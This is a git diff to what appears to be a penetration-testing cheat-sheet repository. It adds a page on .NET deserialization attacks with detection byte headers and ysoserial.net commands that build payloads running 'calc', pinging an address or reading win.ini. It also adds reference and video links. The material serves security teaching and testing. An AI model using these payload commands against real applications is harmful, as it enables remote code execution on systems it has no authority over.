diff --git a/Insecure Deserialization/DotNET.md b/Insecure Deserialization/DotNET.md new file mode 100644 index 0000000..976a9f4 --- /dev/null +++ b/Insecure Deserialization/DotNET.md @@ -0,0 +1,48 @@ +# .NET Serialization + +## Summary + +* [Detection](#detection) +* [Exploit](#exploit) +* [References](#references) + + +## Detection + +* `AAEAAD` (Hex) = .NET deserialization BinaryFormatter +* `FF01` (Hex) / `/w` (Base64) = .NET ViewState + +Example: `AAEAAAD/////AQAAAAAAAAAMAgAAAF9TeXN0ZW0u[...]0KPC9PYmpzPgs=` + + +## Exploit + +* [pwntester/ysoserial.net - Deserialization payload generator for a variety of .NET formatters](https://github.com/pwntester/ysoserial.net) +```ps1 +$ cat my_long_cmd.txt | ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -s +$ ./ysoserial.exe -p DotNetNuke -m read_file -f win.ini +$ ./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "calc" -t +$ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t +``` + +### JSON.NET + +```ps1 +./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t +``` + +### BinaryFormatter + +> The BinaryFormatter type is dangerous and is not recommended for data processing. Applications should stop using BinaryFormatter as soon as possible, even if they believe the data they’re processing to be trustworthy. BinaryFormatter is insecure and can’t be made secure. + + +```ps1 +./ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.10.10" -t +``` + + +## References + +* [Attacking .NET deserialization - Alvaro Muñoz - 28 avr. 2018](https://youtu.be/eDfGpu3iE4Q) +* [Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits - ALYSSA RAHMANDEC](https://www.mandiant.com/resources/blog/hunting-deserialization-exploits) +* [Exploiting Deserialisation in ASP.NET via ViewState - Soroush Dalili (@irsdl) - 04/2019](https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/) \ No newline at end of file diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md index a62322f..23b8391 100644 --- a/Insecure Deserialization/README.md +++ b/Insecure Deserialization/README.md @@ -9,6 +9,15 @@ Check the following sub-sections, located in other files : * [Ruby : universal rce gadget, ...](Ruby.md) * [Python : pickle, ...](Python.md) * [YAML : PyYAML, ...](YAML.md) +* [.NET : ysoserial.net, ...](DotNET.md) + +| Object Type | Header (Hex) | Header (Base64) | +|-----------------|--------------|-----------------| +| Java Serialized | AC ED | rO | +| .NET ViewState | FF 01 | /w | +| Python Pickle | 80 04 95 | gASV | +| PHP Serialized | 4F 3A | Tz | + ## LABS @@ -16,8 +25,8 @@ Check the following sub-sections, located in other files : ## References -* [Github - ysoserial](https://github.com/frohoff/ysoserial) -* [Github - ysoserial.net](https://github.com/pwntester/ysoserial.net) +* [Github - frohoff/ysoserial](https://github.com/frohoff/ysoserial) +* [Github - pwntester/ysoserial.net](https://github.com/pwntester/ysoserial.net) * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md) * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/) * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a) @@ -33,4 +42,5 @@ Check the following sub-sections, located in other files : * [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals * [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e) * [.NET Gadgets](https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf) by Alvaro Muñoz (@pwntester) & OleksandrMirosh -* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) \ No newline at end of file +* [ExploitDB Introduction](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) +* [Exploiting insecure deserialization vulnerabilities - PortSwigger](https://portswigger.net/web-security/deserialization/exploiting) \ No newline at end of file diff --git a/_LEARNING_AND_SOCIALS/YOUTUBE.md b/_LEARNING_AND_SOCIALS/YOUTUBE.md index 853f44c..0584635 100644 --- a/_LEARNING_AND_SOCIALS/YOUTUBE.md +++ b/_LEARNING_AND_SOCIALS/YOUTUBE.md @@ -19,6 +19,14 @@ - [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw) - [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ) +- [HACKING GOOGLE Series](https://www.youtube.com/watch?v=aOGFY1R4QQ4) + - [EP000: Operation Aurora | HACKING GOOGLE](https://youtu.be/przDcQe6n5o) + - [EP001: Threat Analysis Group | HACKING GOOGLE](https://youtu.be/N7N4EC20-cM) + - [EP002: Detection and Response | HACKING GOOGLE](https://youtu.be/QZ0cpBocl3c) + - [EP003: Red Team | HACKING GOOGLE](https://youtu.be/TusQWn2TQxQ) + - [EP004: Bug Hunters | HACKING GOOGLE](https://youtu.be/IoXiXlCNoXg) + - [EP005: Project Zero | HACKING GOOGLE](https://youtu.be/My_13FXODdU) + ## Conferences - [Hunting for Top Bounties - Nicolas Grégoire](https://www.youtube.com/watch?v=mQjTgDuLsp4)